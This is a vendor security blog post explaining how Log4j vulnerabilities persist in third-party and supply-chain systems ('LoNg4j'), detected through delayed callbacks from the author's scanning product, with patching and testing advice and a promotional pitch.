LoNg4j Findings Confirm Log4j Vulnerability Patching Gaps

December 6, 2022 | by Jason Kent

API Security - Patching Gaps

Roughly a year ago, IT and application security teams experienced a dark time. We found out that our logging systems were vulnerable to a specific attack that allowed an attacker to gain shell access. This vulnerability was particularly bad because the system had to be public to be exploited. What made it more significant was that it impacted infrastructure components that are always plugged into the web but often aren’t thought about. The vulnerable component: Log4j and the exploit is what we now know as Log4Shell. Today, I still hear horror stories of all night scrambles to get a scanner running and find all the instances.

To help our customers find all the vulnerable instances, we added a Log4j detection capability to API Spyder. Any inbound DNS requests API Spyder received were time-stamped as an added datapoint. API Spyder was finding Log4j instances for our customers and they were patching them as quickly as they were found. First 12 were found, then 10, then 8, then 12 again….wait, what? It seemed something was going on. The fluctuations in log4j instances found was not a bug – it turned out to be something we called LoNg4J.

LoNg4J Explained

Demonstrating how connected our systems really were, LoNg4J are instances of Log4j vulnerability found upstream in your digital supply chain. One of the API Spyder detection techniques inserts a vulnerability test payload into a header. So when the initial tests were done, the transactions were logged, and the results came back negative – no Log4j. Then those logs were compiled/processed/parsed by an additional system that is vulnerable and returns the results back to API Spyder that Log4J is present.

While the news cycles around Log4j have come and gone, the vulnerability still exists. As I sit here writing this, almost a year later, our team still sees API Spyder light up with detections across our customers and prospects. In some cases, the vulnerability resides in an organization we are not engaged with yet, resulting in a responsible disclosure submission.

Learn more about API Spyder

Initial Responses to Log4j and Log4Shell Discoveries: Denial

When informed that an organization may have a vulnerability, the initial response often comes in the form of “let me see exactly how you did this.” We often get requests that challenge the validity of our claims, so we have processes in place to ensure we aren’t crying wolf. The next response is usually “we have already patched this in all of our systems” followed by “tell us how you found this.” Digging through the API Spyder data repository, I can pull out the requests and responses to illustrate what how the LoNg4j instances was found. In the most recent case we were seeing our tests generating returns from one of their vendor systems that performs an orchestration function. Denial here might be accurate, your systems aren’t impacted but, your digital supply chain may be.

This pattern of doubt or denial is common when an organization is made aware of potential vulnerability via a Responsible Disclosure. It’s important to note that if someone tries to inform you that they have found a vulnerability in your app or web site, be willing to believe it. A Responsible Disclosure notification is done with the interest of helping. There are further steps many organizations go through on this journey, but that first step of acceptance is the hardest to get over. I am not sure why.

Vulnerability management is a very difficult to execute properly. It’s a significant resource drain, requiring massive amounts of coordination to apply the simplest of patches. The initial patches and deployments are often flawed or must be applied again, and that assumes that you know which systems needs patching. Then what happens when the patch breaks something else? Now, when you consider the number of servers and resources in a large organization, you can understand why it is so hard. Keep in mind though, response to an attacker getting shell on one of your servers, with a very small script, is even harder to handle than vulnerability management. Once an attacker has access, the average time they spend on a system is over 180 days and that assumes you find them and kick them out.

Staying Ahead of Log4j and LoNg4j

The widespread use of Log4j and the vast library of internal and 3rd-party servers that organizations have deployed means that the vulnerability will be with us for years to come. Confirming this assertion, in the last six months API Spyder has found over 4,000 instances of Log4j and LoNg4j in the wild. Many of these detections have been in 3rd-party systems or buried deep in our customers supply chain. My recommendations to our customers is to remain vigilant, regardless of how successful your patching efforts may appear to be.

  • Understand your exposure: Use API testing and penetration tools to fully understand your public facing threat footprint and what your adversaries see.
  • Expand testing parameters: Include potential 3rd-party and digital supply chain including targets in your testing efforts.
  • Exercise patience: Lengthen testing timeframes to as long as 24 hours to accommodate supply chain traversal that incorporates log analysis or event correlation.
  • Track inventory and assess risks: Use visibility gained during initial analysis for continuous inventory tracking, API risk assessment and threat detection.
  • Remediate and mitigate: Patch discovered vulnerabilities quickly, block threats in real-time to prevent data loss and business disruption.

Log4j, LoNg4j and Log4Shell will not disappear anytime soon, making it imperative that all organizations are aware of the risks and are fully prepared.

Confirm your Log4j and LoNg4j patching efforts are complete with a free API Spyder assessment.

Jason Kent

Author

Jason Kent

Hacker in Residence

Additional Resources